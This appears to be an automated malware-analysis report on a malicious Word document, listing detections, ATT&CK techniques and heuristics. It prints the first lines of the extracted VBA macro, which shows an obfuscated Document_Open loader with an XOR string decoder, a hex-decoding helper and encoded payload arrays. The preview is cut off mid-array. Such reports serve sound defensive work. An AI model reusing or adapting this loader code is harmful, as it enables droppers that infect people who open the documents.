Verdict: MALICIOUS
Risk Score: 262
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains a heavily obfuscated VBA macro within the Document_Open subroutine. This macro utilizes CreateObject and likely decodes and executes a payload, as indicated by the 'Obfuscated auto-exec VBA loader' and 'VBA p-code auto-exec with execution tokens' heuristics. The ClamAV detection 'Doc.Dropper.HexEncodedEXEHeader' further supports the payload dropping behavior. The embedded URL is benign and likely a false positive.
Heuristics (7)
- ClamAV: Doc.Dropper.HexEncodedEXEHeader-9789587-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.HexEncodedEXEHeader-9789587-1
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 96980 bytes | 294ffc6fe0341cc6070a8a6bb6d5994b3c9b447acb330e971c66e94ab9b99cf4 |
Preview script: first 1,000 lines of the extracted script

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    If ActiveDocument.Variables("wKBiop").Value <> "toto" Then
        mlXVqVrOPcqAFza
        ActiveDocument.Variables("wKBiop").Value = "toto"
        If ActiveDocument.ReadOnly = False Then
            ActiveDocument.Save
        End If
    End If
End Sub
Attribute VB_Name = "avNKjNE"
Private Function gWPCoDbMXk(QSuWileXSF As Variant, QUrVTlEkSs As Integer)
    Dim PzdiTNcqVI, xfUtzFhyNf As String, dFNWHXQhiR, GRMiznsleu
    xfUtzFhyNf = ActiveDocument.Variables("wKBiop").Value()
    PzdiTNcqVI = ""
    dFNWHXQhiR = 1
    While dFNWHXQhiR < UBound(QSuWileXSF) + 2
        GRMiznsleu = dFNWHXQhiR Mod Len(xfUtzFhyNf): If GRMiznsleu = 0 Then GRMiznsleu = Len(xfUtzFhyNf)
        PzdiTNcqVI = PzdiTNcqVI + Chr(Asc(Mid(xfUtzFhyNf, GRMiznsleu + QUrVTlEkSs, 1)) Xor CInt(QSuWileXSF(dFNWHXQhiR - 1)))
        dFNWHXQhiR = dFNWHXQhiR + 1
    Wend
    gWPCoDbMXk = PzdiTNcqVI
End Function
Private Function decodeHex(hex)
    On Error Resume Next
    Dim DM, EL
    Set DM = CreateObject(gWPCoDbMXk(Array(3, 57, 55, 65, 26, 1, 11, 16, 34, 71, 33, 24, 34, 30, 40, 12), 15901))
    Set EL = DM.createElement(gWPCoDbMXk(Array(69, 43, 58), 6246))
    EL.DataType = gWPCoDbMXk(Array(0, 6, 63, 77, 17, 85, 73), 14094)
    EL.Text = hex
    decodeHex = EL.NodeTypedValue
End Function
Sub mlXVqVrOPcqAFza()
    Dim binary As String
    binary = gWPCoDbMXk(Array(7, 29, 33, 34, 46, 58, 114, 1, 102, 15, 76, 43), 7149)
    Dim code As String
    code = ""
    code = code & gWPCoDbMXk(Array(120, 36, 13, 45, 7, 3, 115, 22, 109, 59, 33, 30, 1, 51, 37, 50, 57, 104, 51, 15, 61, _
        6, 13, 58, 7, 9, 30, 36, 56, 87, 12, 0, 33, 82, 22, 8, 51, 36, 35, 123, 14, _
        49, 6, 60, 10, 15, 4, 83, 117, 19, 38, 16, 54, 39, 75, 22, 11, 34, 32, 44, 12, _
        13, 2, 107, 33, 107, 8, 103, 57, 73, 12, 12, 49, 2, 40, 6, 53, 7, 45, 1, 5, _
        6, 5, 39, 37, 53, 38, 28, 24, 74, 13, 43, 12, 85, 12, 6, 119, 45, 17, 57), 456)
    code = code & gWPCoDbMXk(Array(102, 32, 89, 24, 13, 62, 4, 53, 93, 89, 29, 124, 55, 5, 19, 58, 58, 84, 65, 25, 40, _
        91, 13, 13, 91, 7, 27, 3, 49, 82, 123, 2, 13, 93, 125, 37, 60, 92, 56, 56, 91, _
        112, 20, 47, 50, 54, 38, 5, 44, 51, 29, 43, 0, 67, 84, 6, 35, 1, 30, 33, 18, _
        40, 59, 22, 123, 24, 30, 125, 46, 49, 11, 7, 50, 107, 18, 52, 38, 89, 112, 107, 78, _
        5, 50, 95, 30, 35, 54, 58, 102, 99, 40, 9, 37, 112, 80, 57, 2, 13, 114, 6), 13494)
    code = code & gWPCoDbMXk(Array(82, 67, 6, 28, 88, 46, 21, 3, 36, 112, 26, 44, 14, 105, 101, 19, 0, 119, 56, 10, 6, _
        45, 13, 40, 22, 99, 80, 104, 20, 84, 60, 51, 23, 62, 42, 20, 61, 10, 17, 30, 99, _
        92, 59, 38, 117, 15, 24, 41, 32, 56, 5, 3, 99, 4, 16, 69, 9, 75, 20, 8, 44, _
        42, 39, 38, 59, 52, 48, 36, 23, 115, 58, 29, 1, 60, 96, 119, 29, 88, 46, 24, 64, _
        15, 58, 48, 40, 11, 17, 45, 27, 44, 39, 54, 56, 23, 11, 0, 37, 48, 4, 107), 17317)
    code = code & gWPCoDbMXk(Array(18, 10, 47, 61, 52, 56, 26, 9, 97, 87, 39, 25, 36, 28, 64, 37, 3, 42, 18, 50, 17, _
        83, 43, 90, 14, 60, 20, 47, 16, 13, 8, 61, 52, 9, 97, 101, 45, 15, 126, 111, 27, _
        36, 12, 43, 38, 11, 6, 121, 125, 36, 90, 17, 31, 7, 12, 27, 35, 69, 81, 109, 98, _
        85, 82, 55, 23, 37, 45, 70, 107, 77, 19, 50, 69, 18, 125, 35, 47, 2, 54, 18, 119, _
        9, 44, 25, 25, 1, 42, 118, 1, 57, 10, 94, 97, 14, 92, 32, 33, 41, 34, 14), 4746)
    code = code & gWPCoDbMXk(Array(8, 22, 31, 101, 92, 83, 62, 11, 36, 28, 30, 19, 117, 17, 67, 98, 120, 84, 11, 14, 47, _
        38, 34, 54, 55, 52, 17, 61, 30, 73, 42, 44, 23, 105, 97, 38, 19, 38, 41, 69, 40, _
        8, 7, 116, 21, 67, 17, 30, 31, 115, 22, 60, 41, 94, 78, 104, 75, 67, 24, 105, 97, _
        108, 7, 48, 21, 43, 43, 50, 18, 60, 42, 15, 18, 10, 80, 19, 110, 73, 96, 110, 35, _
        117, 12, 26, 0, 102, 63, 115, 19, 47, 122, 91, 30, 123, 14, 29, 59, 20, 67, 28), 3346)
    code = code & gWPCoDbMXk(Array(17, 101, 100, 20, 47, 19, 29, 2, 8, 2, 90, 63, 120, 63, 25, 86, 65, 115, 84, 111, 60, _
        24, 5, 21, 26, 76, 27, 116, 49, 17, 40, 26, 48, 33, 14, 2, 40, 39, 106, 12
... (truncated)
```